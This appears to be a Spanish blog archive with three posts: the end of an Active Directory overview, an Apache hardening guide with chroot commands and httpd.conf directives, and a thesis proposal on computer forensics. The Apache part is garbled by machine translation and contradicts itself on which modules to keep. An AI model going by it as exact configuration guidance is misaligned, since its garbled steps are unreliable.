Algunos objetos, conocidos como contenedores, pueden contener a otros objetos. Por ejemplo, un dominio es un objeto contenedor que puede contener usuarios, equipos y otros objetos. El esquema de Active Directory define los objetos que se pueden almacenar en Active Directory.

D. Esquema de Active Directory
El esquema de Active Directory es una lista de definiciones sobre los tipos de objetos e informaciones sobre esos objetos que se pueden almacenar en Active Directory. Las propias definiciones se almacenan como objetos de forma que Active Directory administra los objetos del esquema con las mismas operaciones de administración de objetos utilizadas con eL resto de los objetos de Active Directory.

Hay dos tipos de definiciones en el esquema: atributos y clases. Los atributos y clases se conocen también como objetos del esquema o metadatos.

Los atributos se definen de forma diferente a las clases. Cada atributo se define sólo una vez y se puede utilizar con muchas clases. Por ejemplo, el atributo Descripción se utiliza en muchas clases, pero se define una vez solamente en el esquema, garantizando de esta manera la consistencia.

Las clases, también denominadas clases de objetos, describen los objetos de Active Directory que se pueden crear. Cada clase es una colección de atributos. Cuando se crea un objeto, los atributos almacenan la información que describe a ese objeto. La clase Usuario, por ejemplo, está compuesta por muchos atributos, que incluyen la Dirección de Red, Directorio Base, etc. Cada objeto de Active Directory es una instancia de una clase de objeto.

E. Componentes de Active Directory
Active Directory utiliza componentes para construir una estructura de directorio acorde con las necesidades de una organización. Las estructuras lógicas de la organización se representan en los siguientes componentes de Active Directory: dominio, unidades organizativas, árboles y bosques. La estructura física de una organización está recogida por los siguientes componentes de Active Directory: sitios (subredes físicas) y controladores de dominio. Active Directory separa completamente la estructura lógica de la física.

a. Estructuras lógicas. En Active Directory, los recursos se organizan en una estructura lógica que refleja la estructura lógica de una organización. Agrupar recursos lógicamente permite encontrar un recurso por su nombre en vez de por su localización física. Por el hecho de agrupar recursos lógicamente, Active Directory hace transparente la estructura física a los usuarios.

b. Dominios. La unidad central de la estructura lógica de Active Directory es el dominio, que puede almacenar millones de objetos. Los objetos que se almacenan en un dominio son aquellos que se consideran «interesantes» para la red. Los objetos «interesantes» son productos que los miembros de la comunidad de la red necesitan para realizar su trabajo: impresoras, documentos, direcciones de correo electrónico, bases de datos, usuarios, componentes distribuidos y otros recursos. Todos los objetos de la red existen en un dominio, y cada dominio almacena información exclusivamente sobre los objetos que contiene. Active Directory está compuesto por uno o más dominios. Un dominio puede expandirse en más de una localización física. Agrupar objetos en uno o más dominios permite a la red reflejar la organización de la empresa. Los dominios comparten estas características: Todos los objetos de red pueden estar dentro de un dominio y un dominio es un límite de seguridad. Las listas de control de acceso (ACL -Access Control List) controlan el acceso a los objetos del dominio.

c. Unidades organizativas. (OU - Organizational Unit) es un contenedor que se utiliza para organizar objetos dentro de un domino en grupos administrativos lógicos que reflejan la estructura funcional y de negocios de una organización. Una OU puede contener objetos tales como cuentas de usuarios, grupos, equipos, impresoras, aplicaciones, archivos compartidos y otras OU del dominio. La jerarquía de una OU dentro de un dominio es independiente de la estructura jerárquica de la OU de otros dominios: cada dominio puede implementar su propia jerarquía de OU. Las OU pueden proporcionar una forma de manejar las tareas administrativas, ya que representan el punto de vista más pequeño de delegación para las autoridades administrativas. Esto proporciona una método para delegar la administración de usuarios y recursos.

d. Árboles. Un árbol es una agrupación o una ordenación jerárquica de uno o más dominios de Windows 2000 que se pueden crear añadiendo uno o más dominios secundarios a un dominio principal existente. Los dominios en un árbol comparten un espacio de nombres contiguo y una estructura jerárquica de nombres. El espacio de nombres se abarca en detalle en la siguiente lección.
Los árboles comparten estas características:
· Acorde con los estándares del Sistema de nombres de dominio (DNS), el nombre de dominio de un dominio secundario es el nombre relativo de ese dominio secundario agregado al nombre del dominio principal.
· Todos los dominios dentro de un mismo árbol comparten un esquema común, que es una definición formal de todas las clases de objeto que se pueden almacenar en el desarrollo de Active Directory.
· Todos los dominios dentro de un mismo árbol comparten un catálogo global, que es el depósito central de información de los objetos del árbol. El catálogo global se comenta en detalle en la siguiente lección.
· Al crear una jerarquía de dominios en un árbol, se puede preservar la seguridad y se puede permitir la administración dentro de una OU o dentro de un dominio simple de un árbol. Los permisos se pueden extender hacia abajo en un árbol mediante la concesión de permisos al usuario utilizando los esquemas comunes de una OU. Esta estructura de árbol puede contemplar con facilidad los cambios en una organización.

e. Bosques. Un bosque es una agrupación o configuración jerárquica de uno o más árboles de dominio distintos y completamente independientes entre sí. Por consiguiente, los bosques tienes las siguientes características:
· Todos los árboles de un bosque comparten un esquema común.
· Los árboles de un bosque tienen diferentes estructuras de nombre de acuerdo con sus dominios.
· Todos los dominios de un bosque comparten un catálogo común global.
· Los dominios en un bosque operan independientemente, pero el bosque permite la comunicación a lo largo de toda la organización.
· Existe una relación transitiva de confianza bidireccional entre los dominios y los árboles de dominio.

F. Estructura física
Los componentes físicos de Active Directory son los sitios y los controladores de dominio. Utilizará estos componentes para desarrollar una estructura de directorio que refleje la estructura física de una organización.

a. Sitios.
Un sitio es una combinación de una o más subredes que utilizan IP conectadas por un enlace rápido y de alta fiabilidad que permite agrupar la mayor cantidad de tráfico posible. Típicamente, un sitio tiene los mismos límites que una red de área local. Cuando se agrupan subredes en una red, se deben combinar solamente aquellas subredes que tengan conexiones rápidas, fiables y baratas.
Con Active Directory, los sitios no son parte de los espacios de nombres. Cuando se mira en el espacio de nombres lógico, se pueden ver equipos y usuarios agrupados en dominios y en OU, no en sitios. Los sitios contienen solamente a los objetos equipo y conexión utilizados para configurar la replicación entre sitios.
Un dominio simple se puede expandir por muchos sitios geográficos, y un único sitio puede contener cuentas de usuario y equipos pertenecientes a muchos dominios.

b. Controladores de dominio
Un controlador de dominio es un equipo con Windows 2000 Server que almacena una copia del directorio de dominio (base de datos local del dominio). Dado que un dominio puede contener uno o más controladores de dominio, todos los controladores de dominio en un dominio tienen una copia completa de la porción de dominio del directorio.

Las funciones de los controladores de dominio, son:
· Cada controlador de dominio almacena una copia completa de toda la información de Active Directory para ese dominio, administra los cambios y replica esos cambios a otros controladores de dominio del mismo dominio.
· Los controladores de dominio de un dominio replican todos los objetos del dominio entre ellos. Cuando se realiza una acción que provoca la actualización de Active Directory, se realiza en realidad un cambio en uno de los controladores de dominio. En ese caso, ese controlador de dominio replica el cambio a los demás controladores de dominio del dominio.
· Los controladores de dominio administran todas las facetas de las interacciones de los usuarios en un dominio, como pueden ser la localización de los objetos de Active Directory y la validación de los intentos de inicio de sesión por parte de los usuarios.

III. ANÁLISIS
Los directorios no son nada que nuevo han estado en una forma u otra desde los años 60. La corriente principal con el lanzamiento de los servicios activos del directorio de Microsoft en servidor del Windows 2000 y la línea de productos 2003 del servidor de Windows.

Hoy, las redes controlan todo de la información de la nómina de pago a la comunicación del E-mail, de las impresoras a los servicios del fax. Mientras que las redes ofrecen más servicios, también exigen a más gerencia. Facilitar el uso y la gerencia de redes es la meta verdadera de un servicio del directorio.

Un servicio del directorio es una base de datos de Red que almacena información de recursos, tal como cuentas del usuario. Un servicio del directorio proporciona un lugar a la información almacenada sobre entidades de la red, tales como usuarios, archivos, impresoras, o aplicaciones. Proporciona una manera constante de nombrar, de describir, de encontrar, de tener acceso, de manejar, y de asegurar a la información sobre esos recursos individuales. El directorio también actúa como el punto central del control y de la gerencia para el sistema operativo de la red. Actúa como la autoridad central para identificar y autenticar correctamente las identidades de recursos. En Microsoft el servicio de directorio activo, desempeña un papel crítico en la capacidad de una organización de manejar la infraestructura de la red, de realizar la administración del sistema y de controlar el ambiente de usuario.

Los administradores se auxilian de Active Directory para:
· Simplificar a la administracion. Actuando como solo punto de la gerencia, un directorio puede facilitar las tareas administrativas asociadas a las redes complejas.
· Proporcionando una mejor seguridad. Ya que que el acceso y la autentificación son controlados con un solo servicio, a los administradores y a los usuarios solamente para saber un solo sistema de herramientas, permitiendo que desarrollen una comprensión mejor de ellas. Los directorios, puesto que ofrecen una sola facilidad de la conexión, proporcionan un proceso más seguro de la autentificación.
· Promueve interoperabilidad. La mayor parte de los servicios de directorio se basan sobre una serie standards industriales, X.500 y LDAP por nombrar algunos.

Los directorios se pueden concebir como una herramienta de administración y de usuario. Como herramienta administrativa con un interfaz central controlada de los recursos, lo cual puede reducir costos administrativos. Como usuario, se pone a su disposición un un servicio central de autenticación para acceder a través de la red a varios recursos.
.

IV. CONCLUSIÓN.

Active Directory o servicio de directorio permite controlar de forma centralizada los recursos de una red. Proporcionando seguridad, mejor administración y reduccion de recursos.

Dentro de los principales servicios que proporcionan en los diferentes campos, estan:
A. En usuarios de Windows:
a. Información de cuentas.
b. Permisos y derechos.
c. Perfiles.
d. Políticas.

B. Conectividad.
a. Políticas de marcado (modem) o conexión (red)}
b. Configuración de VPN.
c. Políticas de seguridad.
d. Configuración de firewall.

C. Servicios de red.
a. DHCP.
b. DNS
c. Puntos compartidos.
d. Políticas.

D. Aplicaciones.
a. Configuración de servidor.
b. Conexión unica.
c. Políticas especificas en aplicaciones.

E. Mensajes.
a. Información en mailbox.
b. Agenda de direcciones.
c. Distribución de grupos.

F. Configuración de herramientas.
a. Seguridad.
b. Calidad del servicio.
c. Seguridad.

G. Delegación de control.
a. Diseño jerárquico
b. Diseño granular.
c. Acceso administrativo controlado.

H. Otros directorios.
a. Sincronización.
b. Seguridad
c. Estandarización industrial de acceso.

V. REFERENCIAS.

LIGA.
DOCUMENTO.
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/

Descripción de Active Directory
Guía de réplica de Active Directory
Microsoft Windows Server 2003 Active Directory
Libro.
Mastering™
Active Directory for
Windows® Server 2003
Robert R. King
SYBEX

Libro.
Active Directory Cookbook
By Robbie Allen
Publisher: O'Reilly
Pub Date: September 2003

Libro.
Windows .NET Server 2003 Domains & Active Directory
by Aleksey Tchekmarev
ISBN:1931769001
A-LIST Publishing © 2003 (516 pages)

http://technet.microsoft.com/es-mx/

Descripción del enrutamiento basado en sitios de Active Directory
http://msdn.microsoft.com/library/spa/
Introducción a los objetos Active Directory

HARDENING APACHE

2008-01-16T16:08:00.000-08:00

INTRODUCCION

Servidor.

Un servidor es un tipo de software que realiza ciertas tareas en nombre de los usuarios. El término servidor ahora también se utiliza para referirse el hardware en el cual funciona ese software, una máquina cuyo propósito es proveer datos de modo que otras máquinas puedan utilizar esos datos.

Los archivos para cada sitio de Internet se almacenan y se ejecutan en el servidor. Hay muchos servidores en Internet y muchos tipos de servidores, pero comparten la función común de proporcionar el acceso a los archivos y servicios.Un servidor sirve información a los equipos que se conecten a él. Cuando los usuarios se conectan a un servidor pueden acceder a programas, archivos y otra información del servidor.

En la web, un servidor web es un ordenador que usa el protocolo http para enviar páginas web al ordenador de un usuario cuando el usuario las solicita. Los servidores web, servidores de correo y servidores de bases de datos son a lo que tiene acceso la mayoría de la gente al usar Internet.

Algunos servidores manejan solamente correo o solamente archivos, mientras que otros hacen más de un trabajo, ya que un mismo ordenador puede tener diferentes programas de servidor funcionando al mismo tiempo.

Los servidores se conectan a la red mediante una interfaz que puede ser una red verdadera o mediante conexión vía línea telefónica o digital.

Apache
Servidor web de código abierto. Su desarrollo comenzó en febrero de 1995, por Rob McCool, en una tentativa de mejorar el servidor existente en el NCSA. La primera versión apareció en enero de 1996, el Apache 1.0. Hacia el 2000, el servidor Web Apache era el más extendido en el mundo. El nombre «Apache» es un acrónimo de «a patchy server» -un servidor de remiendos-, es decir un servidor construido con código preexistente y piezas y parches de código. Es la auténtica «kill app» del software libre en el ámbito de los servidores y el ejemplo de software libre de mayor éxito, por delante incluso del kernel Linux. Desde hace años, más del 60% de los servidores web de Internet emplean Apache.

DESARROLLO

Los pasos para realizar el Hardening de Apache son los siguientes:
Funcionalidad
Suposiciones de Seguridad
Descargar la versión de Apache adecuada.
Preparando el Software
Módulos de Apache
Compilando el Software
Chrooting el servidor
Configurando Apache, editando el archivo httpd.conf.
Cambiar los permisos de los archivos y directorios
Eliminar archivos y directorios no necesarios.
HTTP Logging.
Monitoreo de trafico al servidor
Prevención contra ataques.

La descripción de cada uno de los puntos es:

Funcionalidad
Se debe especificar qué funcionalidad tendrá el servidor, que tecnologías utilizara: PHP, JSP, cgi, ASP, Perl, etc.

Suposiciones de Seguridad
Se deben considerar elementos que son seguros por default, como son:
· El sistema operativo se debe asegurar tanto cuanto sea posible, contra ataques del local y del telnet;
· El servidor no debe ofrecer ningún otro servicios de red excepto el HTTP: (80/TCP);
· El acceso alejado al servidor se debe controlar por un cortafuego, que debe bloquear todas las conexiones de salida, y permite conexiones de entrada solamente al puerto 80/TCP del web server;
· El servidor Apache debe ser el único servicio disponible en el sistema;
· Se deben instalar los módulos absolutamente necesarios de Apache deben ser permitidos;
· El servidor debe divulgar la menos cantidad de información sobre sí mismo (seguridad por oscuridad);
· El servidor de Apache debe funcionar debajo de un UID/GID único, no usado por cualquier otro proceso del sistema;
· Los procesos de Apache deben tener acceso limitado a los archivos de sistema (el chrooting); y,
· Ningunos programas de la cáscara pueden estar presentes en el Apache chrooted el ambiente (/bin/sh, /bin/csh etc.).

El sistema operativo
· Antes de instalar Apache debemos elegir un sistema operativo, sobre el cual el servidor funcionará.
· El primer paso es asegurar el sistema operativo.

Usuarios:
· Es necesario crear un nuevo grupo de usuarios y usuarios que sean necesarios.

Descargar la versión de Apache adecuada.
El paso siguiente es descargar la versión más última del web server de Apache. Algunas de las opciones de Apache se pueden permitir solamente durante tiempo de compilación, así es importante descargar el código de fuente en vez de la versión binaria.

Preparando el Software
Después de descargar el software, debemos desempaquetarlo. Entonces debemos decidir qué módulos deben seguir permitidos.

Módulos de Apache
La opción de módulos es uno de los pasos más importantes de asegurar Apache. Debemos ir por la regla: menos es el mejor. Satisfacer las asunciones de la funcionalidad y de la seguridad, los módulos siguientes deben seguir permitidos:

Nombre del módulo
Descripción
httpd_core
Las características de Apache de la base, requeridas en cada instalación de Apache.
mod_access
Proporciona el control de acceso basado en el hostname del cliente, el IP address, u otras características de la petición del cliente. Porque este módulo es necesario utilizar “orden”, “permitir” y “negar” los directorios, él debe seguir permitido.
mod_auth
Requerido para poner la autentificación del usuario en ejecución usando los archivos de texto (autentificación básica del HTTP), que fue especificada en asunciones de la funcionalidad.
mod_dir
Requerido para buscar y para servir archivos del índice del directorio: “index.html”, “default.htm”, etc.
mod_log_config
Requerido para poner la registración en ejecución de las peticiones hechas al servidor.

mod_mime
Requerido para fijar el juego de caracteres, la codificación del contenido, el tratante, la contenido-lengua, y los tipos del MIME de documentos.

El resto de los módulos de Apache deben ser eliminados. Podemos daros vuelta con seguridad apagado, principalmente porque no los necesitamos. Inhabilitando los módulos innecesarios, podemos evitar robos potenciales cuando las nuevas vulnerabilidades de la seguridad se encuentran en uno de ellos.
Modulos a deshabilitar
info.
status
autoindex
imap
include
userdir
auth
Modulos a habilitar
· ssl
· auth_ldap

Es también valor para observar que dos de los módulos de Apache pueden ser más peligrosos que otros: mod_autoindex y mod_info. El primer módulo preve la indexación de direcciones automática del directorio, y es permitido por el defecto. Es muy fácil utilizar este módulo para comprobar si Apache funciona en un servidor (e.g. http://server_name/icons/) y conseguir el contenido de los directorios del web server, cuando no se encuentra ningunos archivos del índice en ellos. El segundo módulo, mod_info, debe nunca ser accesible del Internet, principalmente porque revela la configuración del servidor de Apache.

Chrooting el servidor
Es decir limitar el acceso de los procesos de Apache a los filesystems. La técnica chrooting significa crear una nueva estructura del directorio de raíz, moviendo todos los demonios a este directorio, y correr al demonio apropiado en ese nuevo ambiente.

Comenzaremos este proceso creando una nueva estructura del directorio de raíz bajo directorio de /chroot/httpd:

mkdir -p /chroot/httpd/dev
mkdir -p /chroot/httpd/etc
mkdir -p /chroot/httpd/var/run
mkdir -p /chroot/httpd/usr/lib
mkdir -p /chroot/httpd/usr/libexec
mkdir -p /chroot/httpd/usr/local/apache/bin
mkdir -p /chroot/httpd/usr/local/apache/logs
mkdir -p /chroot/httpd/usr/local/apache/conf
mkdir -p /chroot/httpd/www

Se debe realizar con privilegios de root, con permisos de acceso 0755. Posteriormente se debe crear un archivo especial del dispositivo: /dev/null:

ls -al /dev/null
crw-rw-rw- 1 root wheel 2, 2 Mar 14 12:53 /dev/null
mknod /chroot/httpd/dev/null c 2 2
chown root:sys /chroot/httpd/dev/null
chmod 666 /chroot/httpd/dev/null

En el caso de un sistema de FreeBSD, la línea siguiente se debe agregar a /etc/rc.conf:
syslogd_flags= " - l /chroot/httpd/dev/log "

El paso siguiente es copiar el programa principal del httpd en el árbol nuevo del directorio con todos sus binarios y librerias necesarias. Para hacer eso, debemos elaborar la lista de todos los archivos requeridos. Podemos hacer tal lista usando los comandos siguientes (su presencia depende de sistema operativo particular):

Comando
Disponibilidad
Ion de Descript
ldd
Todos
Dependencias dynamiic de las listas de ficheros ejecutables o de librerías compartidas
ktrace/ktruss/kdump
*BSD
Permite el trazo de proceso del kernal, exhibe datos del rastro del kernal
sotruss
Solaris
Llamadas del procedimiento de la librería compartida de los rastros
strace/ltrace
Linux
Llamadas y señales del sistema de los rastros
String
Todos
Encuentra las secuencias imprimibles en archivos binarios
trace
AIX
Los expedientes seleccionaron acontecimientos del sistema
trace (freeware)
HP-UX <10.20>11
Remonta las llamadas del sistema que un proceso invoca en HP-UX 11

Configurando Apache, editando el archivo httpd.conf.
El primer paso es quitar el archivo de hroot/httpd/usr/local/apache/conf/httpd.conf y crear un nuevo en su lugar. Comparado con el archivo de la configuración de Apache del defecto, se han realizado los cambios siguientes:
El número de módulos permitidos se ha reducido perceptiblemente
Apache no divulga la información sobre su número de versión (directorios: ServerTokens, ServerSignature)
Los procesos de Apache (excepto el proceso de la raíz) se fijan para ser ejecutados con los privilegios regulares únicos del usuario/del grupo (directorios: Usuario, grupo)
Apache permitirá el acceso solamente a los directorios, a los subdirectories y a los archivos, que se especifican explícitamente en el archivo de la configuración (directorios: El directorio, permite); el resto de las peticiones serán negadas por el defecto
Apache registrará más información sobre peticiones del HTTP

Directive and setting
Description/rationale
ServerSignature Off
Evita dar información de versión y errores en pagina Web
ServerTokens Prod
Evita dar la versión del Servidor en encabezados de http.
Listen 80 (remove)
Borra la directiva “Listen” , solo disponible en ssl.conf, es decir, el servidor solo estara disponible en https.
User webserv (or whatever you created in step 2 above)
Todos los proceso hijo correran con privilegios de usuario no root.
Group webserv (or whatever you created in step 2 above)
Todos los proceso hijo correran con privilegios de grupo no root
ServerAdmin -webmaster@xianco.com
Use un alias de mail
UserDir disabled root
Deshabilitar comando para acceso archivos

Order Deny, Allow
deny from all

Denegar acceso a archivos de sistema.

Cambiar los permisos de los archivos y directorios
Se debe verificar el control de acceso al directorio de principal de Apache, tal como se ha visto en los incisos principales; si estamos el sistemas Unix los permisos deben ser 0775. En los siguientes archivos:
· Htdocs
· Cgi-bin
· Logs-dir
· Bin-dir

Eliminar archivos y directorios no necesarios.
Todos aquellos directorios y archivos no validos deben ser eliminados.

HTTP Logging.
Los servidores del Web normalmente permiten registrar el tráfico en el mismo a través de bitacoras, sin embargo no tienen la capcidad de analizar el cuerpo de las peticiones de servicio, por lo que se explota la vulnerabilidad en POST para realizar ataques.
A la fecha ya existe software adicional que permite un registro completo de peticiones y respuestas con una granularidad mayor que la que permite el mismo servidor.

Monitoreo de trafico al servidor
Además es de contar con elementos de registro proporcionar, se puede supervisar el trafico en la red hacia el servidor, para evitar ataques

Prevención contra ataques.
El firewall debe contar con las reglas necesarias a fin de minimizar loas vulnerabilidades, en base a peticiones usuarios, direcciones IP, sesiones, aceptando en general solo peticiones validas.

ANALISIS

El método mencionado permite el alcanzar de un nivel más alto de la seguridad del servidor de Apache que el ofrecido en la instalación por defecto.

Permite solamente los módulos absolutamente necesarios de Apache, encontrando una nueva vulnerabilidad en uno de ellos no tiene que indicar que nuestro servidor es vulnerable. El número de versión de Apache que oculta, dando vuelta del servicio de la indexación de direcciones del directorio, el chrooting y la configuración restricta hacen un robo acertado muy difícil.
Además si se habilita el protocolo SSL para asegurar Apache, se necesitan crear los certificados necesarios para utilizar la encripcion de las comunicaciones, los certificados se deben instalar en el servidor Web.

La opción LDAP (Lightweight Directory Access Protocol) se puede habilitar en el servidor Apache agregando las directivas de autenticación adecuadas en un archivo aparte o en el mismo httpd.conf, LDAP almacena la información de login (usuario y contraseña) y es utilizado para autenticarse aunque es posible almacenar otra información (datos de contacto del usuario, ubicación de diversos recursos de la red, permisos, certificados, etc).

PROPUESTA DE TEMA DE INVESTIGACIÓN

2008-01-07T16:49:00.000-08:00

PROPUESTA DE TEMA DE INVESTIGACIÓN TIPO TESIS.

TITULO: “ANÁLISIS Y PROPUESTA DEL EMPLEO DE UNA METODOLOGÍA DE PERITAJE INFORMÁTICO EN LA ...”

I. ÁREA DEL CONOCIMIENTO: Inteligencia
LÍNEA DE INVESTIGACIÓN: Seguridad de la Información

II. CONTEXTO DE LA INVESTIGACIÓN
Se define a Peritaje como el "Trabajo o estudio realizado por un perito o experto con la finalidad de corroborar determinadas circunstancias o hechos". El peritaje se realiza por una persona que, tiene conocimientos especiales teóricos, técnicos o prácticos; informa, bajo juramento, al juzgador sobre puntos litigiosos en cuanto se relaciona con su especial saber o experiencia.

Se conoce como peritaje informático a los estudios e investigaciones orientados a la obtención de una prueba informática de aplicación en un asunto judicial para que sirva a un juez para decidir sobre la culpabilidad o inocencia de una de las partes.

Son también los estudios e investigaciones usados en asuntos privados para la búsqueda de pruebas y argumentos que sirvan a una de las partes en discusión para decantar la discrepancia a su favor. Habitualmente se recurre a pruebas periciales informáticas en asuntos penales en los que la infraestructura informática media como herramienta del delito. Son otros asuntos los delitos contra la propiedad privada e intelectual, espionaje industrial, protección de datos personales, fraudes, sabotajes, etc...

En nuestro país existen pocos elementos para castigar los Delitos Informáticos, por lo que el presentar evidencia es un elemento básico, esto se logra a través de un peritaje informático detallado y metodológico.

Las Instituciones de Seguridad se deben contar con elementos que permitan realizar un peritaje informático en forma precisa, metodológica y eficiente. La ... realiza estos procedimientos en forma empírica y por personal sin la especialidad y/o conocimientos necesarios.

III. JUSTIFICACIÓN/APORTACIÓN.
El desarrollo de la tecnología informática ha abierto las puertas a nuevas posibilidades de delincuencia. Los daños ocasionados son a menudo superiores a lo usual en la delincuencia tradicional y también son mucho más elevadas las posibilidades de que no lleguen a descubrirse o castigarse estos hechos. El delito informático implica actividades criminales que los especialistas en legislación, han tratado de encuadrar en figuras típicas de carácter tradicional, tales como robos, hurtos, fraudes, falsificaciones, perjuicios, estafas, sabotajes.

Ante el suceso de un delito informático u otro delito en el que se considere que equipos de cómputo pueden presentar evidencias, es necesario realizar un peritaje informático.

La falta de una metodología para realizar un peritaje informático ante el suceso de un delito informático en la .... o en sucesos impliquen a esta Institución, puede impactar en dos hechos: en responsabilidad para la Secretaria ... y segundo, en no presentar elementos suficientes como evidencia.

Por lo anterior y de no adoptarse una metodología de peritaje informático, ante un suceso así que lo amerite, no se tendrá una peritaje confiable.

IV. IMPORTANCIA.
De lograr el empleo de una metodología de peritaje informático, se contara con una herramienta que permita realizar un análisis, estudio, inspección, de elemento causa del peritaje informático en forma eficiente, confiable y segura.

Entre otros beneficios se encuentran, evitar la erogación de gastos en una empresa consultora de seguridad para la realización de un peritaje informático, ser una institución que puede proveer a otras dependencias un arbitraje informático confiable y metodológico.